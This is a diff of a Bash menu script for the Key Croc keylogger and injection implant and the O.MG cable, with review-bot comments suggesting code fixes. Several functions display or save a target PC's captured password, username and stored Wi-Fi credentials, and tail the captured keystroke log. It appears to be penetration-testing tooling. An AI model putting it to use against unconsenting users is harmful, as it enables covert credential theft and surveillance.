$m_a in - 1) get_online_p ; install_payloads ;; - 2) croc_unlock_p ; install_payloads ;; - 3) wifi_setup_p ; install_payloads ;; - 4) quick_croc_pot ; install_payloads ;; - 5) screen_shot ; install_payloads ;; - 6) main_menu ;; - 0) exit 0 ;; - [bB]) menu_B ;; - *) invalid_entry ; install_payloads ;; + 1) get_online_p ; install_payloads ;; 2) croc_unlock_p ; install_payloads ;; 3) wifi_setup_p ; install_payloads ;; 4) quick_croc_pot ; install_payloads ;; 5) screen_shot ; install_payloads ;; + 6) croc_bite ; install_payloads ;; 7) web_site ; install_payloads ;; 8) screen_on ;; 9) text_replace ; install_payloads ;; 10) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; install_payloads ;; + esac +} +## +#----O.MG cable Menu/Functions +## +function omg_cable() { + clear + local omg_v=/root/udisk/tools/Croc_Pot/OMG_WIFI.txt + echo -ne "$(Info_Screen ' +-# 1 connect keycroc to O.MG wifi access point +-# 2 Start O.MG web UI ensure keycroc is connected to O.MG AP first +-# 3 O.MG Github web page +-# 4 Create payload to connect Quickly to O.MG wifi access point +-# 5 Scan local network for O.MG cable')\n\n" 
+## +#----O.MG connect keycroc to O.MG wifi access point +## +omg_wifi() { + clear + echo -ne "$(Info_Screen ' +-Connect keycroc wifi to O.MG wifi access point +-Ensure O.MG cable is setup as wifi access point +-The purpose to this is access O.MG cable or Keycroc remotely +-From a remote device that is connected to O.MG wifi access point')\n\n" +## +#----O.MG scan for O.MG wifi access point +## +if [ -e "${omg_v}" ]; then + local scan_ssid=$(iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n 's/.*\('$(sed -n 1p ${omg_v})'\).*/\1/p') + if [ "$(sed -n 1p ${omg_v})" = "${scan_ssid}" ]; then + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n '/'$(sed -n 1p ${omg_v})'/p' + echo -ne "${green}O.MG wifi access point online${clear}\n" + else + echo -ne "${red}O.MG wifi access point offline${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort + fi +else + read_all ENTER O.MG SSID AND PRESS [ENTER] + local scan_ssid=$(iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n 's/.*\('${r_a}'\).*/\1/p') + if [ "${r_a}" = "${scan_ssid}" ]; then + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n '/'${r_a}'/p' + echo -ne "${green}O.MG wifi access point online${clear}\n" + else + echo -ne "${red}O.MG wifi access point offline${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? 
"\n" : " "; print}' | sort + fi +fi +## +#----O.MG start connection +## + read_all START CONNECTION Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) +if [ -e "${omg_v}" ]; then + echo -ne "${yellow}FOUND EXISTING O.MG WIFI CREDENTIALS${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n '/'$(sed -n 1p ${omg_v})'/p' + read_all USE EXISTING O.MG CREDENTIALS AND CONNECT Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + echo -ne "${yellow}Editing the keycroc config file to O.MG WIFI credentials${clear}\n" + sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID '$(sed -n 1p ${omg_v})'\nWIFI_PASS '$(sed -n 2p ${omg_v})'\nSSH ENABLE' /root/udisk/config.txt + LED G + echo -ne "${green}Keycroc is now config to O.MG unplug keycroc and plug back in${clear}\n" ;; +[nN] | [nN][oO]) + rm ${omg_v} + read_all ENTER O.MG SSID AND PRESS [ENTER] ; echo "${r_a}" >> ${omg_v} + echo -ne "${yellow}Checking for O.MG wifi access point ${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? 
"\n" : " "; print}' | sort + echo -ne "$(ColorYellow 'ENTER O.MG WIFI CREDENTIALS')\n" + user_input_passwd ${omg_v} O.MG_WIFI + echo -ne "${yellow}Editing the keycroc config file to O.MG WIFI credentials${clear}\n" + sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID '$(sed -n 1p ${omg_v})'\nWIFI_PASS '$(sed -n 2p ${omg_v})'\nSSH ENABLE' /root/udisk/config.txt + LED G + echo -ne "${green}Keycroc is now config to O.MG unplug keycroc and plug back in${clear}\n" ;; +*) + invalid_entry ; omg_wifi ;; + esac +else + echo -ne "${red}DID NOT FOUND ANY EXISTING O.MG WIFI CREDENTIALS${clear}\n" + read_all CONNECT KEYCROC TO O.MG CABLE WIFI ACCESS POINT Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + echo -ne "${yellow}Checking for O.MG wifi access point ${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort + echo -ne "$(ColorYellow 'ENTER O.MG WIFI CREDENTIALS')\n" + read_all ENTER O.MG SSID AND PRESS [ENTER] ; echo "${r_a}" >> ${omg_v} + user_input_passwd ${omg_v} O.MG_WIFI + echo -ne "${yellow}Editing the keycroc config file to O.MG WIFI credentials${clear}\n" + sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID '$(sed -n 1p ${omg_v})'\nWIFI_PASS '$(sed -n 2p ${omg_v})'\nSSH ENABLE' /root/udisk/config.txt + LED G + echo -ne "${green}Keycroc is now config to O.MG unplug keycroc and plug back in${clear}\n" ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_wifi ;; + esac +fi ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_wifi ;; +esac +} +## +#----O.MG start O.MG web UI +## +omg_web() { + clear + echo -ne "$(Info_Screen ' +-Open target pc web browser and start O.MG web UI +-Ensure target pc is connected to O.MG wifi access point first')\n\n" + read_all START O.MG WEB UI Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + start_web http://192.168.4.1 ;; +[nN] | [nN][oO]) + 
echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_web ;; +esac +} +## +#----O.MG wifi access point payload +## +omg_quick_connect() { + clear + echo -ne "$(Info_Screen ' +-Create payload to connect Quickly to O.MG wifi access point +Select # 3 WIFI SETUP PAYLOAD to create payload')\n\n" + read_all CREATE PAYLOAD FOR O.MG QUICK CONNECT AP Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + install_payloads ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_quick_connect ;; +esac +} +## +#----O.MG check local network for O.MG cable +## +omg_check() { + clear + echo -ne "$(Info_Screen ' +-Check local network for O.MG cable +-Ensure O.MG is connected to same local network as Keycroc')\n\n" +## +#----Ping entire network +## + read_all SCAN FOR O.MG CABLE Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + local t_ip=$(route -n | grep "UG" | grep -v "UGH" | cut -f 10 -d " " | sed -r 's/.{1}$//') + for omg in {1..254} ;do (ping -q -c 1 -w 1 $t_ip$omg >/dev/null && echo "$t_ip$omg" &) ;done + arp -a | sed -n 's/\(OMG\)/\1/p' + local omg_ip=$(arp -a | sed -n 's/\(OMG\)/\1/p' | awk '{print $2}' | sed 's/[(),]//g') + if [[ "${omg_ip}" =~ ${validate_ip} ]]; then + ping -q -c 1 -w 1 ${omg_ip} &>/dev/null 2>&1 + if [[ $? 
-ne 0 ]]; then + echo -ne "${red}No O.MG cable detected${clear}" + elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "${yellow}O.MG cable IP:${clear}${green}${omg_ip}${clear}\n" + read_all START O.MG WEB UI Y/N AND PRESS [ENTER] + case $r_a in + [yY] | [yY][eE][sS]) + start_web http://${omg_ip} ;; + [nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; + *) + invalid_entry ; omg_check ;; + esac + fi + else + echo -ne "${red}No O.MG cable detected${clear}" + fi ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_check ;; +esac +} +## +#----O.MG cable Menu +## +MenuTitle O.MG CABLE MENU ; MenuColor 21 1 KEYCROC TO O.MG WIFI ; MenuColor 21 2 START O.MG WEB UI ; MenuColor 21 3 O.MG GITHUB PAGE ; MenuColor 21 4 O.MG AP PAYLOAD ; MenuColor 21 5 O.MG LOCAL NETWORK ; MenuColor 21 6 RETURN TO MAIN MENU ; MenuEnd 24 + case $m_a in + 1) omg_wifi ; omg_cable ;; 2) omg_web ; omg_cable ;; 3) start_web https://github.com/O-MG ; omg_cable ;; 4) omg_quick_connect ;; 5) omg_check ; omg_cable ;; 6) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; omg_cable ;; esac } ## #----Croc Pot Plus Menu ## -menu_B() { +function menu_B() { + clear LED B -MenuTitle CROC POT PLUS MENU -MenuColor 1 RECON SCAN ; echo -ne " ${clear}\n" -MenuColor 2 KEYSTORKES LAPTOP ; echo -ne " ${clear}\n" -MenuColor 3 WINDOWS INFO SCAN ; echo -ne " ${clear}\n" -MenuColor 4 CROC VPN SETUP ; echo -ne " ${clear}\n" -MenuColor 5 PASS TIME GAMES ; echo -ne " ${clear}\n" -MenuColor 6 WINDOWS DEFENDER ; echo -ne " ${clear}\n" -MenuColor 7 INSTALL PAYLOADS ; echo -ne " ${clear}\n" -MenuColor 8 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd + croc_title +MenuTitle CROC POT PLUS MENU ; MenuColor 20 1 RECON SCAN MENU ; MenuColor 20 2 KEYSTORKES LAPTOP ; MenuColor 20 3 WINDOWS INFO SCAN ; MenuColor 20 4 CROC VPN SETUP ; MenuColor 20 5 PASS TIME GAMES +MenuColor 20 6 WINDOWS DEFENDER ; MenuColor 20 7 INSTALL PAYLOADS ; MenuColor 20 8 O.MG CABLE 
MENU ; MenuColor 20 9 RETURN TO MAIN MENU ; MenuEnd 23 case $m_a in - 1) croc_recon ; menu_B ;; - 2) keystorkes_laptop ; menu_B ;; - 3) windows_check ; menu_B ;; - 4) croc_vpn ; menu_B ;; - 5) pass_time ; menu_B ;; - 6) windows_defender ; menu_B ;; - 7) install_payloads ; menu_B ;; - 8) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; menu_B ;; + 1) croc_recon ; menu_B ;; 2) keystorkes_laptop ; menu_B ;; 3) windows_check ; menu_B ;; 4) croc_vpn ; menu_B ;; 5) pass_time ; menu_B ;; 6) windows_defender ; menu_B ;; + 7) install_payloads ; menu_B ;; 8) omg_cable ; menu_B ;; 9) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; menu_B ;; esac } menu_B @@ -3863,6 +5583,7 @@ menu_B #----Croc status menu/functions ## function croc_status() { + local LOOT_INFO=/root/udisk/loot/Croc_Pot/KeyCroc_INFO.txt ## #----SSH Install screenfetch ## 
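Review bot: In `omg_wifi` the config edit `sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID '$(sed -n 1p ${omg_v})'\nWIFI_PASS '$(sed -n 2p ${omg_v})'\nSSH ENABLE' /root/udisk/config.txt` splices the stored SSID and password into the sed script through unquoted command substitutions, so a value containing a space, a glob character or a backslash is word-split or reinterpreted and the edit fails or writes something else into `config.txt`. The same line is repeated three times, and the scan filters build their sed patterns from `${r_a}` and `$(sed -n 1p ${omg_v})` in the same way. Writing the three config lines to a temporary file and letting sed read it keeps the values as data, and one helper replaces the three copies. `OMG_WIFI.txt` also keeps the password in clear text on the udisk, which deserves at least a comment next to `omg_v`. Separately, `omg_check` tests `${#args[@]}` although no `args` array is assigned anywhere in this hunk, so that `elif` is always taken.

```shell
# … unchanged: omg_wifi prompts, scan output and credential entry …
omg_write_config() {
  local creds
  creds=$(mktemp) || return
  printf 'WIFI_SSID %s\nWIFI_PASS %s\nSSH ENABLE\n' \
    "$(sed -n 1p "${omg_v}")" "$(sed -n 2p "${omg_v}")" > "${creds}"
  sed -i -E -e '/^[WS]/d' -e "9 r ${creds}" /root/udisk/config.txt
  rm -f -- "${creds}"
}
# each of the three branches then calls: omg_write_config
```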
@@ -3870,62 +5591,66 @@ function croc_status() { ## #----SSH Display screenfetch ## -echo -ne "\n\e[48;5;202;30m${LINE}${clear}\n" -screenfetch 2> /dev/null -echo -ne "\e[48;5;202;30m${LINE}${clear}\n" -local server_name=$(hostname) + echo -ne "\n\e[48;5;202;30m${LINE}${clear}\n" + screenfetch 2> /dev/null + echo -ne "\e[48;5;202;30m${LINE}${clear}\n" + local server_name=$(hostname) memory_check() { clear - echo -ne "\n$(ColorYellow 'Memory usage on') ${server_name} is:\n" - egrep --color=auto 'Mem|Cache|Swap' /proc/meminfo - free -t -m - cat /proc/meminfo - vmstat - df -h - iostat + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}MEMORY STATUS${LINE_}\n" | tee -a ${LOOT_INFO} ; cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done ; echo ${LINE} | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'Memory usage on') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; df -h | xargs | awk '{print "Free/total disk: " $11 " / " $9}' | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + egrep --color=auto 'Mem|Cache|Swap' /proc/meminfo | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; free -t -m | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; cat /proc/meminfo | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + vmstat | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; df -h | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; iostat | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } cpu_check() { clear - echo -ne "\n$(ColorYellow 'CPU load on') ${server_name} is:\n" - more /proc/cpuinfo && lscpu | grep MHz --color=auto - lscpu | egrep 'Model name|Socket|Thread|NUMA|CPU\(s\)' - echo "Threads/core: $(nproc --all)" - echo "Number of CPU/cores online at $HOSTNAME: $(getconf _NPROCESSORS_ONLN)" - echo -ne "CPU TEMP: $(cat /sys/class/thermal/thermal_zone0/temp)°C USAGE: $(top -bn1 | grep 
"Cpu(s)" | sed "s/.*, *\([0-9.]*\)%* id.*/\1/" | awk '{print 100 - $1"%"}')" + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}CPU STATUS${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'CPU load on') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + more /proc/cpuinfo && lscpu | grep MHz --color=auto | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; lscpu | egrep 'Model name|Socket|Thread|NUMA|CPU\(s\)' | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + echo "Threads/core: $(nproc --all)" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; echo "Number of CPU/cores online at $HOSTNAME: $(getconf _NPROCESSORS_ONLN)" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + echo -ne "CPU TEMP: $(cat /sys/class/thermal/thermal_zone0/temp)°C USAGE: $(top -bn1 | grep "Cpu(s)" | sed "s/.*, *\([0-9.]*\)%* id.*/\1/" | awk '{print 100 - $1"%"}')\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } tcp_check() { clear - echo -ne "\n$(ColorYellow 'Network/connections on') ${server_name} is:\n" - netstat -l ; echo ${LINE} ; netstat -r ; echo ${LINE} ; netstat -tunlp ; echo ${LINE} ; iw dev wlan0 scan - iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? 
"\n" : " "; print}' | sort ; echo ${LINE} - arp -a -e -v ; echo ${LINE} ; ss -p -a ; echo ${LINE} ; /sbin/ifconfig -a + rm ${LOOT_INFO} + install_package speedtest-cli SPEEDTEST-CLI tcp_check + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}NETWORK STATUS${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'Network/connections on') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + netstat -l | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; netstat -r | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; netstat -tunlp | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; iw dev wlan0 scan | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + iw wlan0 scan | egrep --extended-regexp 'BSS ([[:xdigit:]]{1,2}:)|signal: |SSID: |\* Manufacturer: |\* Model Number: |\* Serial Number: |\* Device name: ' | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + arp -a -e -v | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; ss -p -a | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; for interface in $(ls /sys/class/net/); do echo -ne "${interface}\n"; done | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; /sbin/ifconfig -a | tee -a ${LOOT_INFO} + echo ${LINE} | tee -a ${LOOT_INFO} ; curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; speedtest | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } kernel_check() { clear - echo -ne "\n$(ColorYellow 'Kernel version on') ${server_name} is:\n" - uname --all - hostnamectl - cat /proc/version + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}KERNEL STATUS${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'Kernel version on') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + uname --all | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; hostnamectl | tee -a 
${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; cat /proc/version | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } processes_check() { clear - echo -ne "\n$(ColorYellow 'Running Processes') ${server_name} is:\n" - ps -aux ; echo ${LINE} ; service --status-all ; echo ${LINE} ; findmnt -A ; echo ${LINE} ; usb-devices + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}PROCESSES STATUS${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "${yellow}Last logins:${clear}\n" | tee -a ${LOOT_INFO} ; last -a | head -3 | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'Running Processes') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + ps -aux | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; service --status-all | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; findmnt -A | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; usb-devices | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } ## -#----Status KeyCroc info +#----Status check all KeyCroc info ## all_checks() { clear - local LOOT_INFO=/root/udisk/loot/Croc_Pot/KeyCroc_INFO.txt - rm -f ${LOOT_INFO} - croc_title_loot >> ${LOOT_INFO} + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}ALL CHECK STATUS${LINE_}\n" | tee -a ${LOOT_INFO} echo -ne "\t${LINE_}KEYCROC INFO${LINE_}\n${LINE}\nCROC FIRMWARE: $(cat /root/udisk/version.txt)\nKEYCROC CONFIG SETTING:\n$(sed -n '/^[DWS]/p' /root/udisk/config.txt)\n${LINE}\nUSER NAME: $(whoami)\nHOSTNAME: $(cat /proc/sys/kernel/hostname) IP: $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) $(ifconfig eth0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)\nPUBLIC IP: $(curl ifconfig.co)\nMAC ADDRESS: $(ip -o link | awk '$2 != "lo:" {print $2, $(NF-2)}')\n${LINE}\nVARIABLES CURRENT USER:\n$(env)\n${LINE}\n INTERFACE: $(ip route show default | awk '/default/ {print $5}')\nMODE: $(cat /tmp/mode)\nSSH: 
root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)\nDNS: $(sed -n -e 4p /etc/resolv.conf)\nDNS: $(sed -n -e 5p /etc/resolv.conf)\nDISPLAY ARP: $(ip n)\n${LINE}\nROUTE TALBE: $(ip r)\nNETWORK:\n$(ifconfig -a)\n${LINE}\nSYSTEM UPTIME: $(uptime)\n SYSTEM INFO: $(uname -a)\n${LINE}\nUSB DEVICES:\n$(usb-devices)\n${LINE}\nBASH VERSION:\n$(apt-cache show bash)\n${LINE}\nLINUX VERSION:\n$(cat /etc/os-release)\n${LINE}\nSSH KEY:\n$(ls -al ~/.ssh)\n$(cat ~/.ssh/id_rsa.pub)\n${LINE}\n MEMORY USED:\n$(free -m)\n$(cat /proc/meminfo)\n${LINE}\nSHOW PARTITION FORMAT:\n$(lsblk -a)\n${LINE}\nSHOW DISK USAGE:\n$(df -TH)\n\t${LINE_A}>MORE DETAIL<${LINE_A}\n$(fdisk -l)\n${LINE}\nCHECK USER LOGIN:\n$(lastlog)\n${LINE}\nCURRENT PROCESS:\n$(ps aux)\n${LINE}\nCPU INFORMATION:\n$(more /proc/cpuinfo)\n$(lscpu | grep MHz)\n${LINE}\nCHECK PORT:\n$(netstat -tulpn)\n -${LINE}\nRUNNING SERVICES:\n$(service --status-all)\n${LINE}\nINSTALLED PACKAGES:\n$(dpkg-query -l)\n${LINE}\nIDENTIFIER (UUID):\n$(blkid)\n${LINE}\nDIRECTORIES:\n$(ls -la -r /etc /var /root /tmp /usr /sys /bin /sbin)\n${LINE}\nDISPLAY TREE:\n$(pstree)\n${LINE}\nSHELL OPTIONS:\n$(shopt)\n${LINE}\n" >> ${LOOT_INFO} +${LINE}\nRUNNING SERVICES:\n$(service --status-all)\n${LINE}\nINSTALLED PACKAGES:\n$(dpkg-query -l)\n${LINE}\nIDENTIFIER (UUID):\n$(blkid)\n${LINE}\nDIRECTORIES:\n$(ls -la -r /etc /var /root /tmp /usr /sys /bin /sbin)\n${LINE}\nDISPLAY TREE:\n$(pstree)\n${LINE}\nSHELL OPTIONS:\n$(shopt)\n${LINE}\n" >> ${LOOT_INFO} ; curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com ; echo "${LINE}" cat ${LOOT_INFO} } ## 
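Review bot: Each status function (`memory_check` through `all_checks`) now starts with a bare `rm ${LOOT_INFO}`, where the old `all_checks` used `rm -f`; on a first run, or after the loot file has been moved, that prints a "No such file" error right after `clear`. The command that follows, `croc_title_loot | tee ${LOOT_INFO}`, truncates the file anyway, so the line can be dropped or written as `rm -f -- "${LOOT_INFO}"`. The same line is added to `pc_info` in the next hunk. In `cpu_check`, `more /proc/cpuinfo && lscpu | grep MHz --color=auto | tee -a ${LOOT_INFO}` pipes only the `lscpu` output into the report, so the cpuinfo text is shown but not saved, which looks unintended.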
@@ -3933,24 +5658,27 @@ ${LINE}\nRUNNING SERVICES:\n$(service --status-all)\n${LINE}\nINSTALLED PACKAGES ## pc_info() { clear + rm ${LOOT_INFO} local CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt local CROC_OS_TARGET=/root/udisk/tools/Croc_Pot/Croc_OS_Target.txt if [ "$(OS_CHECK)" = WINDOWS ]; then - echo -ne "\n$(ColorYellow 'KeyCroc is pluged into:')${green} $(OS_CHECK) -$(ColorYellow 'Target PC Host name:')${green} $(sed -n 3p ${CROC_OS}) -$(ColorYellow 'Target PC Passwd:')${green} $(target_pw) -$(ColorYellow 'Target Pc user name:')${green} $(sed -n 1p ${CROC_OS_TARGET}) -$(ColorYellow 'Target Pc IP:')${green} $(sed '2,6!d' ${CROC_OS_TARGET}) + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}TARGET PC INFO${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'KeyCroc is pluged into:')${green} $(OS_CHECK)${clear} +$(ColorYellow 'Target PC Host name:')${green} $(sed -n 3p ${CROC_OS})${clear} +$(ColorYellow 'Target PC Passwd:')${green} $(target_pw)${clear} +$(ColorYellow 'Target Pc user name:')${green} $(sed -n 1p ${CROC_OS_TARGET})${clear} +$(ColorYellow 'Target Pc IP:')${green} $(sed '2,6!d' ${CROC_OS_TARGET})${clear} $(ColorYellow 'Target Pc SSID + PASSWD and MAC address:')${green} -$(sed '9,24!d' ${CROC_OS_TARGET})\n" +$(sed '9,24!d' ${CROC_OS_TARGET})${clear}\n" | tee -a ${LOOT_INFO} elif [ "$(OS_CHECK)" = LINUX ]; then - echo -ne "\n$(ColorYellow 'KeyCroc is pluged into:')${green} $(OS_CHECK) -$(ColorYellow 'Target PC Host name:')${green} $(sed -n 3p ${CROC_OS}) -$(ColorYellow 'Target PC Passwd:')${green} $(target_pw) -$(ColorYellow 'Target Pc user name:')${green} $(sed -n 1p ${CROC_OS_TARGET}) -$(ColorYellow 'Target Pc IP:')${green} $(sed -n '2,3p' ${CROC_OS_TARGET}) + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}TARGET PC INFO${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'KeyCroc is pluged into:')${green} $(OS_CHECK)${clear} +$(ColorYellow 'Target PC Host name:')${green} $(sed -n 3p ${CROC_OS})${clear} 
+$(ColorYellow 'Target PC Passwd:')${green} $(target_pw)${clear} +$(ColorYellow 'Target Pc user name:')${green} $(sed -n 1p ${CROC_OS_TARGET})${clear} +$(ColorYellow 'Target Pc IP:')${green} $(sed -n '2,3p' ${CROC_OS_TARGET})${clear} $(ColorYellow 'Target Pc SSID + PASSWD and MAC address:')${green} -$(sed '4,20!d' ${CROC_OS_TARGET})${clear}\n" +$(sed '4,20!d' ${CROC_OS_TARGET})${clear}\n" | tee -a ${LOOT_INFO} else echo -ne "$(ColorRed 'PLEASE RUN CROC_POT PAYLOAD TO GET TARGET PC USER NAME AND IP')" fi 
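Review bot: The `| tee -a ${LOOT_INFO}` added to both `echo -ne` blocks in `pc_info` saves the text exactly as displayed, so KeyCroc_INFO.txt now receives the `${green}`/`${clear}` escape sequences together with the `target_pw` output and the SSID and password lines. Pass the text through `sed 's/\x1b\[[0-9;]*m//g'` before it is appended so the report stays plain text. A comment above `pc_info` should also state that the report now contains credentials, so that it is handled and deleted with the rest of the engagement data. `pc_info` continues past the end of this hunk.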
@@ -3959,43 +5687,65 @@ fi #----Status start live keystorke ## keystorkes_V() { - echo -ne "\e[5m$(ColorYellow 'PRESS COMTROL + C TO EXIT')" - sleep 2 - cd loot - tail -f croc_char.log - menu_A + clear + echo -ne "$(Info_Screen ' +-PRESS CONTROL + C TO EXIT live keylog +-View croc_char.log filter out [ENTER] [BACKSPACE]..ect +-To read full croc_char.log file enter arming mode to sync file')\n" + sleep 3 + cat /root/udisk/loot/croc_char.log | sed 's/\[ENTER]/\n/g' | sed 's/\[[^]]*\]//g' | sed '/^[[:space:]]*$/d' | tr -s ' ' + echo -ne "\n\e[48;5;202;30m${LINE}${clear}\n" + read_all START LIVE KEYLOG Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + tail -f /root/udisk/loot/croc_char.log ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; keystorkes_V ;; +esac } ## #----Status nmon monitoring system ## nmon_system() { - echo -ne "$(Info_Screen '-nmon is short for Nigels performance 